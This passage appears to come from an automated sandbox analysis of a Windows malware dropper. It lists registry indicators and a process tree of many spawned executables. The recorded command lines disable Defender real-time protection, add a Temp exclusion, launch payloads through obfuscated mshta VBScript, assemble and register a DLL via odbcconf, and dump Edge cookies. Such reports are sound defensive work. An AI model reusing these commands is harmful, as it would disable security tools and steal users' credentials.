| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\11111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15e81af69f990d3a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun154ca5fada.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1524d92394d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-JE0HU.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun150e9a93676ff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15132bf2c585337a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15a8461882.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun154ca5fada.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15168f90478cc7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15591a43f8a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15b94526a807b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1500b8e65c1f53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15132bf2c585337a0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun150e9a93676ff.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15c4c762b69ba5.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe
Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1524d92394d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156aa32cae4a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15e81af69f990d3a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1515dbfc0edab0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1585e1028b0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156d9ca8467.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15591a43f8a.exe
Sun15591a43f8a.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe
Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe
Sun15635943177.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe
Sun15a8461882.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15372e8db79ed3d.exe
Sun15372e8db79ed3d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe
Sun156aa32cae4a.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun154ca5fada.exe
Sun154ca5fada.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun150e9a93676ff.exe
Sun150e9a93676ff.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15168f90478cc7.exe
Sun15168f90478cc7.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe
Sun15c4c762b69ba5.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe
Sun15b94526a807b.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1580e9cd8c23e.exe
Sun1580e9cd8c23e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15132bf2c585337a0.exe
Sun15132bf2c585337a0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15e81af69f990d3a6.exe
Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1515dbfc0edab0.exe
Sun1515dbfc0edab0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe
Sun1585e1028b0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1524d92394d.exe
Sun1524d92394d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe
Sun156d9ca8467.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\is-0F5D4.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0F5D4.tmp\Sun15b94526a807b.tmp" /SL5="$6021A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 232 -ip 232
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if """"== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4324 -ip 4324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 232 -s 408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 408
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-JE0HU.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JE0HU.tmp\Sun15b94526a807b.tmp" /SL5="$30242,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe") do taskkill /f -im "%~Nxi"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe" ) do taskkill -f /Im "%~NXg"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe" -u
C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe
..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -im "Sun15635943177.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""-PS7ykUulCvwqoVkaBFLeqX_1Bi ""== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2244 -ip 2244
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if "-PS7ykUulCvwqoVkaBFLeqX_1Bi "== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 356
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "Sun156d9ca8467.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCrIPT: ClOSE (CReaTeobjECt ( "wsCRIPt.ShelL" ). run ( "cmd.EXe /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = ""MZ"" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F + 16AqXIX.Y + lSIVmd4C.I + VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q * ",0 ,TRUe ))
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR & copy /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = "MZ" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F+ 16AqXIX.Y+ lSIVmd4C.I+ VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q *
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>PCN3bFXS.F"
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN }
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffaaaffcc40,0x7ffaaaffcc4c,0x7ffaaaffcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2564 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3084 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3088,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3124 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
